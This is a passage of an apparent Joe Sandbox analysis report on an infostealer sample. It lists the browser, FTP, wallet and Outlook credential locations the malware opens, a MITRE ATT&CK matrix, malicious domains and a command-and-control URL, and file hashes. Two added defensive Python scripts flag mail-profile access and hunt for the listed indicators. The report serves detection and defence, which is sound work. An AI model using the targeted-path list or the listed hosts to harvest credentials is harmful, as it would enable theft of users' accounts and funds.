          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPbox
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPInfo
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPGetter
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\FTPRush
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\ProgramData\SiteDesigner\3D-FTP
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Binance
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERSS-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\S-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\S-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\S-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif  Key opened: HKEY_USERS\.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
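The registry lines above are what the "Tries to steal Mail credentials (via file / registry access)" signature keys on: a binary running out of a Temp directory walks the MAPI profile store (Windows Messaging Subsystem\Profiles) under every hive it can reach, HKEY_CURRENT_USER, .DEFAULT and the NetworkService SID. The following script is an added example, not code from Joe Sandbox or from this report; it parses lines in the report's own "Source: ... Key opened: ..." shape (including the collapsed form the extraction left, with the separator and the backslash after HKEY_USERS missing), and flags profile-store reads by processes outside Program Files and Windows. The sample lines and the trusted-path allowlist are constructed assumptions, not report data.

```python
import re
from dataclasses import dataclass

# Constructed sample lines (not copied from the report) in the shape of the
# behaviour section above: "Source: <process>  Key opened: <key>".  The parser
# also accepts the collapsed form in which extraction dropped the separator
# and the backslash after HKEY_USERS.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001",
    r"Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERS.DEFAULT\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002",
    r"Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_USERSS-1-5-20\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003",
    # Benign control (constructed): Outlook itself reading its own profile store.
    r"Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE  Key opened: HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001",
    # Unrelated key from the same dropper: must not be reported by this check.
    r"Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
]

LINE_RE = re.compile(r"^Source: (?P<proc>.+?)\s*Key opened: (?P<key>.+)$")
# Repair "HKEY_USERSS-1-5-20" / "HKEY_USERS.DEFAULT" back to "HKEY_USERS\...".
HIVE_FIX = re.compile(r"^HKEY_USERS(?=S-1-5-|\.DEFAULT)")
MAIL_PROFILE_MARK = "\\windows messaging subsystem\\profiles\\"
# Assumption: a coarse allowlist of install locations; see the note below on its limits.
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


@dataclass(frozen=True)
class Finding:
    process: str
    account: str        # hive, plus the SID or .DEFAULT under HKEY_USERS
    profile_entry: str  # MAPI profile section, e.g. 00000002


def normalize_key(key: str) -> str:
    return HIVE_FIX.sub(lambda _: "HKEY_USERS\\", key, count=1)


def parse_line(line: str):
    """Return (process, normalized key) or None for lines that are not key-open events."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("proc"), normalize_key(m.group("key"))


def account_of(key: str) -> str:
    parts = key.split("\\")
    return "\\".join(parts[:2]) if parts[0] == "HKEY_USERS" else parts[0]


def is_mail_profile_key(key: str) -> bool:
    return MAIL_PROFILE_MARK in key.lower()


def is_trusted_process(proc: str) -> bool:
    return proc.lower().startswith(TRUSTED_PREFIXES)


def find_mail_credential_access(lines) -> list:
    """Profile-store reads by a process that does not live in a trusted install location."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, key = parsed
        if is_mail_profile_key(key) and not is_trusted_process(proc):
            findings.append(Finding(proc, account_of(key), key.rsplit("\\", 1)[-1]))
    return findings


def summarize(findings) -> dict:
    """Process -> sorted list of the accounts whose mail profiles it touched."""
    out = {}
    for f in findings:
        out.setdefault(f.process, set()).add(f.account)
    return {proc: sorted(accounts) for proc, accounts in out.items()}


if __name__ == "__main__":
    for proc, accounts in summarize(find_mail_credential_access(SAMPLE_LINES)).items():
        print(f"{proc} read Outlook profiles of: {', '.join(accounts)}")
```

The path allowlist is deliberately crude: it separates the Temp-resident dropper from Outlook, but the same report notes that this sample injects into explorer.exe, and the identical profile reads issued from inside explorer.exe would pass a path-based check. In production, key the allowlist on the signer of the reading image and on whether the process is the one that owns the profile, not on where the image lives.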

          Remote Access Functionality

Source: Yara match  File source: 0000000C.00000003.1864702800.00000000014A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 0000000C.00000002.2521442122.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (rebuilt from the flattened table; the number in front of a technique is the hit count shown in the report, techniques without a number are the matrix template's unmatched cells):

Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties
Resource Development: 1 Scripting | Domains | DNS Server | Virtual Private Server | Server | Botnet
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media
Execution: 21 Windows Management Instrumentation | 2 Scheduled Task/Job | At | Cron | Launchd | Scheduled Task
Persistence: 2 Scheduled Task/Job | 1 Scripting | 1 Registry Run Keys / Startup Folder | 11 DLL Side-Loading | Network Logon Script | RC Scripts
Privilege Escalation: 511 Process Injection | 2 Scheduled Task/Job | 1 Abuse Elevation Control Mechanism | 1 Registry Run Keys / Startup Folder | 11 DLL Side-Loading | RC Scripts
Defense Evasion: 121 Masquerading | 131 Virtualization/Sandbox Evasion | 511 Process Injection | 1 Abuse Elevation Control Mechanism | 11 DLL Side-Loading | Steganography
Credential Access: 2 OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials
Discovery: 22 Security Software Discovery | 2 Process Discovery | 131 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 2 File and Directory Discovery | 153 System Information Discovery
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC
Collection: 1 Email Collection | 3 Data from Local System | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture
Command and Control: 1 Web Service | 2 Encrypted Channel | 2 Non-Application Layer Protocol | 3 Application Layer Protocol | Fallback Channels | Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop

          No Antivirus matches
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\215655\Comparing.pif | 5% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\rrwkeeb | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn2.creative-habitat.shop | 188.114.97.3 | true | false | | unknown
cdn1.creative-habitat.shop | 188.114.96.3 | true | false | | unknown
cdn4.creative-habitat.shop | 188.114.96.3 | true | false | | unknown
proggresinvj.cyou | 104.21.32.51 | true | false | | unknown
rentry.co | 172.67.75.40 | true | true | | unknown
gardenhub-fitlife.com | 172.67.182.119 | true | true | | unknown
tkuIaWVNSUOHYBGsHHYaNMFgSmiW.tkuIaWVNSUOHYBGsHHYaNMFgSmiW | unknown | unknown | true | | unknown
gardenhub-fitlife3.com | unknown | unknown | true | | unknown
gardenhub-fitlife2.com | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
http://gardenhub-fitlife.com/g9jvjfd73/index.php | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | cdn2.creative-habitat.shop | European Union | 13335 | CLOUDFLARENETUS | false
188.114.96.3 | cdn1.creative-habitat.shop | European Union | 13335 | CLOUDFLARENETUS | false
172.67.182.119 | gardenhub-fitlife.com | United States | 13335 | CLOUDFLARENETUS | true
184.28.90.27 | unknown | United States | 16625 | AKAMAI-ASUS | false
172.67.75.40 | rentry.co | United States | 13335 | CLOUDFLARENETUS | true
104.21.32.51 | proggresinvj.cyou | United States | 13335 | CLOUDFLARENETUS | false

IP
127.0.0.1
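Every IP the report marks malicious sits in CLOUDFLARENET (AS13335), and rentry.co, flagged malicious here, is a public paste service that the report's own signature describes as a pastebin used as a dead drop. Those two facts decide how the network indicators should be consumed: the domains and the exact URL carry the decision, the IPs only corroborate. The script below is an added example, not part of the report, that loads the indicators from the tables above, weights them that way, and runs them over constructed DNS and proxy log lines. The log format, the host names in it and the Cloudflare range subset are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Indicators copied from the report's domain, URL and IP tables above.
MALICIOUS_DOMAINS = {"gardenhub-fitlife.com", "gardenhub-fitlife2.com", "gardenhub-fitlife3.com"}
MALICIOUS_URLS = {"http://gardenhub-fitlife.com/g9jvjfd73/index.php"}
MALICIOUS_IPS = {"172.67.182.119", "172.67.75.40"}
# rentry.co is flagged malicious in the report, but it is a public paste service
# (the report's own signature calls it a pastebin), so a bare domain hit is only a
# medium: the path is what identifies the dead drop.
DEAD_DROP_DOMAINS = {"rentry.co"}
# Contacted during the run but not flagged malicious: surface at low confidence.
RELATED_DOMAINS = {"cdn1.creative-habitat.shop", "cdn2.creative-habitat.shop",
                   "cdn4.creative-habitat.shop", "proggresinvj.cyou"}
# Subset of Cloudflare's published edge ranges (assumption: current at time of
# writing).  An IP-only hit inside them is shared infrastructure, not attribution.
SHARED_EDGE_NETWORKS = [ipaddress.ip_network(n) for n in
                        ("104.16.0.0/13", "104.24.0.0/14", "172.64.0.0/13", "188.114.96.0/20")]
RANK = {"low": 0, "medium": 1, "high": 2}

# Constructed log lines (not from the report) in a simple key=value shape:
# "<ts> dns host=<name> query=<fqdn> answer=<ip>" or "<ts> http host=<name> url=<url> method=<m>".
SAMPLE_LOGS = [
    "2024-11-02T21:42:01Z dns  host=WS-17 query=gardenhub-fitlife.com answer=172.67.182.119",
    "2024-11-02T21:42:02Z http host=WS-17 url=http://gardenhub-fitlife.com/g9jvjfd73/index.php method=POST",
    "2024-11-02T21:42:05Z dns  host=WS-17 query=rentry.co answer=172.67.75.40",
    "2024-11-02T21:43:10Z dns  host=WS-22 query=www.example.com answer=172.67.0.9",
    "2024-11-02T21:44:00Z dns  host=WS-17 query=cdn2.creative-habitat.shop answer=188.114.97.3",
    "2024-11-02T21:45:00Z http host=WS-31 url=https://rentry.co/abc123/raw method=GET",
]


def domain_matches(name: str, iocs) -> bool:
    """Exact or subdomain match, case-insensitive, trailing dot tolerated."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in iocs)


def is_shared_edge(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in SHARED_EDGE_NETWORKS)


def classify_domain(name: str):
    if domain_matches(name, MALICIOUS_DOMAINS):
        return ("domain", name, "high")
    if domain_matches(name, DEAD_DROP_DOMAINS):
        return ("domain", name, "medium")
    if domain_matches(name, RELATED_DOMAINS):
        return ("domain", name, "low")
    return None


def classify_event(line: str) -> list:
    """All indicator hits on one log line as (kind, value, confidence) tuples."""
    tokens = line.split()
    fields = dict(kv.split("=", 1) for kv in tokens[2:])
    hits = []
    url = fields.get("url")
    if url:
        if url in MALICIOUS_URLS:
            hits.append(("url", url, "high"))
        else:
            hit = classify_domain(urlsplit(url).hostname or "")
            if hit:
                hits.append(hit)
    query = fields.get("query")
    if query:
        hit = classify_domain(query)
        if hit:
            hits.append(hit)
    answer = fields.get("answer")
    if answer and answer in MALICIOUS_IPS:
        # A shared edge address is corroboration only; never escalate on it alone.
        hits.append(("ip", answer, "low" if is_shared_edge(answer) else "high"))
    return hits


def hunt(lines) -> list:
    """(host, kind, value, confidence) for every hit across the log."""
    out = []
    for line in lines:
        host = dict(kv.split("=", 1) for kv in line.split()[2:]).get("host", "?")
        out.extend((host,) + hit for hit in classify_event(line))
    return out


def host_verdicts(lines) -> dict:
    """Highest confidence seen per host."""
    verdicts = {}
    for host, _kind, _value, conf in hunt(lines):
        if RANK[conf] > RANK.get(verdicts.get(host, "low"), -1):
            verdicts[host] = conf
    return verdicts


def hosts_to_escalate(lines) -> list:
    return sorted(h for h, conf in host_verdicts(lines).items() if conf == "high")


if __name__ == "__main__":
    for row in hunt(SAMPLE_LOGS):
        print(row)
    print("escalate:", hosts_to_escalate(SAMPLE_LOGS))
```

The WS-22 line is the false-positive case this weighting exists for: it resolves an unrelated site to another 172.67.0.0/16 edge address, and because the IP is neither in the report's list nor paired with a listed domain it produces nothing. Had 172.67.182.119 been blocked by address, the same block would have hit every other site fronted by that edge.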
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1547706
                              Start date and time:2024-11-02 22:41:38 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:69
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Sample name:MilwaukeeRivers.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.expl.evad.winEXE@114/21@13/31
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded IPs from analysis (whitelisted): 20.3.187.198
                              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • VT rate limit hit for: MilwaukeeRivers.exe
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):15524
                              Entropy (8bit):5.537153882278845
                              Encrypted:false
                              SSDEEP:
                              MD5:35E23EE3776B2DC44063F2776B6D6A38
                              SHA1:43D61A1FA7913DD1644A805E6C30F3BFD267F416
                              SHA-256:D13BE5073F0793FAFCA994100EF6228EB7A16EB0C3C3E9056AFDD66A3A91AC69
                              SHA-512:E7918B6D518309594621F67163C24CD858BA29A07C708A9D3762C635B3AE37B88892E31DBB940506FDD0556ADD7D6EEB0FF7F60830AF766C670C4B955B106C66
                              Malicious:false
                              Reputation:unknown
                              Preview:@...e...........;.....................!.........................H...............o..b~.D.poM...1..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation4...............<."..Ke@...j..........System.Core.0.................Vn.F..kLsw..........System..4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4..................~..2K..}...0".......System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.............................................V.@..?@.Ig@.Eg@.:5@.95@...@.X.@.J.@.Z.@.^...aT..[T...T...S......{T@..S@..T@..S@._.@..T@..T@.VX@.UX@.
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Category:modified
                              Size (bytes):893608
                              Entropy (8bit):6.62028134425878
                              Encrypted:false
                              SSDEEP:
                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 5%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\SysWOW64\cmd.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):509642
                              Entropy (8bit):7.999685073845076
                              Encrypted:true
                              SSDEEP:
                              MD5:D266B3C08227E9CB46232736B80E5AA0
                              SHA1:173C8ACEE3ADEAE51142BD0E72C3309E34EE520F
                              SHA-256:EC2604A7647C0186B5E12315F62C27927DBB1CF8F939612E129DCDFC1392B998
                              SHA-512:59CFE54E855D98F3F4B01FA7670B9594376C450CFE210E5F626574DD7449E066F55B6C8D218428601AC526A9D0F2BA7A244D54C12B4DCA6E0919800B58F31F0B
                              Malicious:false
                              Reputation:unknown
                              Preview:..y...._.4..E..G=..>......2..,.}...8..0.AQu.|)fFHYv.^......h}...K......o...E..c.nt.E...8...f.c....Cmg.....m.l2}.y.~.d.I~OJ...9.{P..&+.N;..*2..Xg...K.y.{.....'.^..VW.r.B{...e...@O./FL..f.2.F.v.'.....vo...!d^Q*...d..Z8.|.^$4.&A>.?s.n.8&.n.F....}...d5X..U...Y..# =.$<w.~...<et.W..?.#.....'@^..#.Z.bAC...km.....G....E_...^.W[k_<B..;;u....ry.&7.m....#......Gk.._=Ub~.,.W{3.n'..b.w"..%c...<.rk.....?.n..J>.4^.O.=.j.Y.c..>.{..D#.v 7_v{....Yu.".`.w.C+..j.k\.x.d./^..3...67`.XJ...Zc3..I.......dz..v."...Sx...8 ....._:..U2...U...e...C....j......5.y....3bG.L#.#..M.hg.t..)..j..4.%k6.3...cE.T.^...)j...!..........'..WW./=C..!u..Qhfj.YW#.k..;.w&....v/....2`..;O.~Qq..P4."....S.l..;..9..[^./.}m.5..C/.1..'...........E..e.C.90&..Y.(y6..,,g..O.R;..nT]...>.?.....NK..`.....[...9.]+...`..y:..<.Zp...lso..z.....$j....^...1Q&.).......|.}.>1...~.J.^...&..B...Q....X$U9..)...?.:...c.7.....:....!.-*&...c..f.c.+.Jw;.....KQ3..3..m.......r.u1.1.~....[6}..Wo.V.&.%...X...AP..
                              Process:C:\Users\user\Desktop\MilwaukeeRivers.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6824
                              Entropy (8bit):6.189007519474476
                              Encrypted:false
                              SSDEEP:
                              MD5:95B88AAC08C10ED0630BFF6E25A48D22
